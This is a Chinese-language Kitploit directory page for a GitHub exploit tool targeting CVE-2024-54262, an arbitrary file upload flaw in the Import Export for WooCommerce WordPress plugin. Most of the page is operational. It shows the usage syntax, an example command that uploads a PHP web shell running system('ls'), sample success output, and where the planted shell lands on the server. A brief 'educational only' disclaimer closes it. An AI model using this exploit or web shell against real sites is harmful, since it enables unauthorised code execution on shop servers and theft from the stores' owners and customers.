Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-54262 — 利用 CVE-2024-54262 漏洞:WooCommerce 导入导出插件中的任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-54262
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubnxploited/cve-2024-54262

CVE-2024-54262

利用 CVE-2024-54262 漏洞:WooCommerce 导入导出插件中的任意文件上传

查看仓库
41年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-54262

利用CVE-2024-54262漏洞:WooCommerce导入导出插件中的任意文件上传

概述

此脚本利用WordPress插件"Import Export for WooCommerce"中的漏洞。该漏洞允许未授权用户上传任意文件,可能导致远程代码执行(RCE)。

功能:

  • 版本检测:自动检查WordPress站点是否运行存在漏洞的插件版本。
  • 身份验证:支持WordPress登录以进一步利用。
  • 文件上传:允许上传恶意PHP文件以实现RCE。

前提条件:

  1. Python 3.x
  2. 所需的Python库:
    • requests
    • argparse

使用以下命令安装依赖:

root@kitploit:~
pip install requests
  1. 确保目标WordPress站点使用的是存在漏洞的插件版本。

用法:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

示例:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

输出说明

  1. 站点存在漏洞。
    • 表示WordPress站点运行的是存在漏洞的插件版本。
  2. 登录成功。
    • 确认使用提供的凭据成功登录。
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • Shell名称:import_manual_1737090262.php
  • Shell路径:wp-content/uploads/import-export-for-woocommerce/product/

免责声明

此工具仅用于教育目的。作者不对任何滥用或由此脚本造成的损害负责。未经明确许可擅自访问或利用系统是非法的且不道德的。

下载工具